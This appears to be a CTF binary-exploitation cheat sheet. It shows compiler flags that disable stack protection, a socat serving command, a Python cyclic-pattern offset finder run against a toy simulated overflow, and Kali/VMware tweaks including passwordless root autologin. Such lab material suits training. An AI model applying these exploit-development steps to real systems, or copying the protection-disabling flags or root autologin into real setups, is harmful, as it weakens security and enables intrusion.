Compile without stack protection and with an executable stack: gcc crash.c -m32 -fno-stack-protector -z execstack -o crash
Serve an executable with socat: socat TCP-LISTEN:7777,reuseaddr,fork EXEC:"./pwn1"
Show a binary's library dependencies: ldd
Buffer overflow pattern generator: https://wiremask.eu/tools/buffer-overflow-pattern-generator/
TOOL: pwntools
Binary security check command: checksec
(NX enabled: the stack is not executable. PIE enabled: the binary is loaded at a random base when ASLR is on. RELRO: the GOT is read-only (Full RELRO) or only partly protected (Partial RELRO); RELRO is a GOT protection, not an ASLR setting.)

CheatSheet: https://github.com/Naetw/CTF-pwn-tips
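Added example (not the page's code): the cyclic pattern the generator site above produces, with the offset lookup you do after the crash, in Python. simulate_overflow stands in for the target binary and its 76-byte offset is an assumption; with a real target you send pattern_create(n) as input and read the EIP/RIP value from the debugger.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...), the same output as the generator site above.
    Every 4-byte window is unique across the full 20280-byte sequence."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length=20280):
    """Offset of the 4 bytes that landed in EIP/RIP; accepts the crash value as an int
    (decoded little-endian, e.g. EIP=0x41356141) or as the 4-character string ('Aa5A')."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    return pattern_create(length).find(needle)


def simulate_overflow(payload, saved_ret_offset=76):
    """Toy stand-in for the target: a fixed-size buffer whose saved return address sits 76 bytes in
    (the offset is an assumption). Returns the 'EIP' value a debugger would show after the crash."""
    return int.from_bytes(payload[saved_ret_offset:saved_ret_offset + 4], "little")


if __name__ == "__main__":
    eip = simulate_overflow(pattern_create(200).encode())
    print(hex(eip), pattern_offset(eip))   # the second value is where the return address starts
```

For 64-bit targets only 6 bytes of the 8-byte RIP are typically valid (canonical address), so search with the low 4 bytes of the faulting RSP/RIP value, or use pwntools' cyclic_find, which handles the width for you.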


Kali Tweaks & VMware Settings:

Passwordless root login:
Uncomment the relevant lines in /etc/gdm3/daemon.conf so that they look like this;

[daemon]
# Enabling automatic login
  AutomaticLoginEnable = true
  AutomaticLogin = root

VMware copy-paste fix:

root@kali:~# apt-get autoremove open-vm-tools
root@kali:~# apt-get install open-vm-tools-desktop

VMware & Windows error fix: bcdedit /set hypervisorlaunchtype off
VMware Device/Credential Guard fix: Watch on YouTube
VMware network settings (Bridged, NAT, Host-only): Watch on YouTube